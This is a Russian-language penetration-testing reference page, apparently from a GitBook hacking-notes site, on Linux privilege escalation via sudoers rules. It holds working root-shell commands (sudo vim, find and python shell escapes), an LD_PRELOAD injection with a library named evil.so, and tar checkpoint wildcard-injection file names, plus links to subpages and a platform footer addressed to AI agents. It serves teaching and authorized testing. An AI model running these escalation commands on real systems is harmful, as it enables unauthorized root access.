> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/privesc/sudoers.md).

# Sudoers

Повышение привилегий в sudoers начинается с команд, которые пользователь может запускать через `sudo`. Неправильно настроенные бинарные файлы, небезопасные аргументы скриптов, обработка символических ссылок и уязвимые версии sudo могут превратить ограниченные права sudo в root-оболочку.

## Методика

* Запустите `sudo -l` и документируйте каждую разрешённую команду, целевого пользователя и правило NOPASSWD.
* Проверьте GTFOBins на возможность выхода в оболочку, записи файлов и выполнения, управляемого аргументами.
* Проверьте скрипты на наличие путей с правом записи, обработку символических ссылок, раскрытие подстановочных знаков и отсутствующие ссылки на файлы.
* Проверьте `sudo --version` когда путь зависит от известной уязвимости sudo CVE.

## Быстрые проверки

```bash
sudo -l
sudo --version
```

## Распространённые злоупотребления sudo

Когда `sudo -l` предоставляет команду, проверьте, может ли эта команда запускать оболочку, записывать файлы, переходить по символическим ссылкам, загружать плагины или раскрывать подстановочные знаки, контролируемые атакующим.

```bash
sudo -i
sudo vim -c '!sh'
sudo find . -exec /bin/sh \; -quit
sudo python -c 'import os; os.system("/bin/sh")'
```

### Сохранение переменных окружения

Если `env_keep` сохраняет переменные загрузчика, `LD_PRELOAD`  или `LD_LIBRARY_PATH` может оказаться полезным. Сначала подтвердите правило sudoers:

```bash
sudo -l
sudo LD_PRELOAD=/tmp/evil.so program
```

### Эксплуатация подстановочных знаков

Злоупотребление подстановочными знаками возникает, когда правило sudo запускает команду над файлами, контролируемыми атакующим, например задания резервного копирования, использующие `*.conf` или архивы, использующие `*`.

```bash
echo 'command' > exploit.conf
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
sudo /usr/bin/rsync *.conf /backup/
```

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo awk</h4></td><td>Примечания по sudo (awk) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/f38c9d76737e7b1d71f1d41ebd2ffab0294b480c">/pages/f38c9d76737e7b1d71f1d41ebd2ffab0294b480c</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo Nmap</h4></td><td>Примечания по sudo (Nmap) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/9572812d30b9e86b96d114ad5c5ad27c6f06d8c9">/pages/9572812d30b9e86b96d114ad5c5ad27c6f06d8c9</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo Perl</h4></td><td>Примечания по sudo (Perl) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/e0453df648bc716ebacde832d2ae82926b65a271">/pages/e0453df648bc716ebacde832d2ae82926b65a271</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo GitPython</h4></td><td>Примечания по sudo (GitPython) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/8ff7fc318c45297fbbb6bf1e550d09d584df3c1f">/pages/8ff7fc318c45297fbbb6bf1e550d09d584df3c1f</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Уязвимости версий sudo</h4></td><td>Примечания по уязвимостям версий sudo для повышения привилегий в Linux по CVE-2019-14287 и CVE-2025-32463.</td><td><a href="/pages/d190b0c636b4e9728b3a3e07aa4fa931cc15ae81">/pages/d190b0c636b4e9728b3a3e07aa4fa931cc15ae81</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo su</h4></td><td>Примечания по sudo (su) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/955eda33fb77e5b9cdf10216f5a6cae80b95a861">/pages/955eda33fb77e5b9cdf10216f5a6cae80b95a861</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo Knife</h4></td><td>Примечания по sudo (Knife) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/23379f6c635b196c2e1493fba58ed3d1af601629">/pages/23379f6c635b196c2e1493fba58ed3d1af601629</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo ALL:ALL</h4></td><td>Примечания по sudo (ALL:ALL) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/3e12af98a4037ed072bce89e9cb4bdb4da6d7673">/pages/3e12af98a4037ed072bce89e9cb4bdb4da6d7673</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo mosh-server</h4></td><td>Примечания по sudo (Mosh-Server) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/17e293a430bba2929003c947ffca35cc301a0383">/pages/17e293a430bba2929003c947ffca35cc301a0383</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo iptables</h4></td><td>Примечания по sudo (iptables) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/56986f9f336f9edc5104ba39bd4ef9239097361c">/pages/56986f9f336f9edc5104ba39bd4ef9239097361c</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo Go</h4></td><td>Примечания по sudo (Go) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/1117eebfc5a9077c9a4f25e75229a21d1bff65ad">/pages/1117eebfc5a9077c9a4f25e75229a21d1bff65ad</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo journalctl</h4></td><td>Примечания по sudo (journalctl) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/07ce173674ba058254290bc74e48fd051fef48be">/pages/07ce173674ba058254290bc74e48fd051fef48be</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo Metasploit</h4></td><td>Примечания по sudo (Metasploit) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/626d56f4d36d4851aae6cd5b45fceaa3e5370cbb">/pages/626d56f4d36d4851aae6cd5b45fceaa3e5370cbb</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo: отсутствующий файл</h4></td><td>Примечания по sudo (файл не найден) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/798da7d9f6c69c021373ff1fa1f90af5ed213641">/pages/798da7d9f6c69c021373ff1fa1f90af5ed213641</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo бинарный файл bee</h4></td><td>Примечания по sudo (бинарный файл bee) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/454a9eec22c5af6d4d11d928b436504f409101b8">/pages/454a9eec22c5af6d4d11d928b436504f409101b8</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo бинарный файл bbot</h4></td><td>Примечания по sudo (бинарный файл bbot) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/856685a40b5768c9f958679700c800c234fee3d0">/pages/856685a40b5768c9f958679700c800c234fee3d0</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Злоупотребление ACL и символическими ссылками в sudo</h4></td><td>Примечания по ACL / символической ссылке в sudo для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/9f7c0a34ba55c07e75772a67bbcc5138c8e7cc0d">/pages/9f7c0a34ba55c07e75772a67bbcc5138c8e7cc0d</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo: двойная символическая ссылка</h4></td><td>Примечания по sudo (двойная символическая ссылка) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/ff2394bade51ca19abffd073d109da8d2b571190">/pages/ff2394bade51ca19abffd073d109da8d2b571190</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo: бинарный файл резервного копирования / символическая ссылка</h4></td><td>Примечания по sudo (бинарный файл резервного копирования / символическая ссылка) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/327468a83684cb6df804679356834dc335765d93">/pages/327468a83684cb6df804679356834dc335765d93</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>sudo скрипт backy.sh</h4></td><td>Примечания по sudo — backy.sh (скрипт) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчётность.</td><td><a href="/pages/a789458b554ed17dcb57947713a841afdc3e6959">/pages/a789458b554ed17dcb57947713a841afdc3e6959</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/privesc/sudoers.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
